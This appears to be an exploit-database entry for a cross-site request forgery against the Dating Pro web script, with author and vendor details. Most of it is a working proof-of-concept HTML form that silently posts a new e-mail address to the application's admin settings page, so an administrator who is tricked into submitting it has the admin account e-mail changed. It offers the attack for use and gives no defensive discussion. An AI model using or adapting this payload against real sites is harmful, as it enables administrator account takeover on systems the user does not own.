# Exploit Title: Dating Pro CSRF (change e-mail address) # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/dating-pro/21517/ # Category:: webapps # Demo : http://demo.datingpro.com/dating/admin # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form name="email_form" action="target.com/[PATH]/admin_settings.php?section=1" method="post"> <input type="hidden" name="email" value="mail@mail.com" size=30> <a href="#" class="admin_button_major" onclick="javascript:document.email_form.submit();">Save<span> </span></a> </form>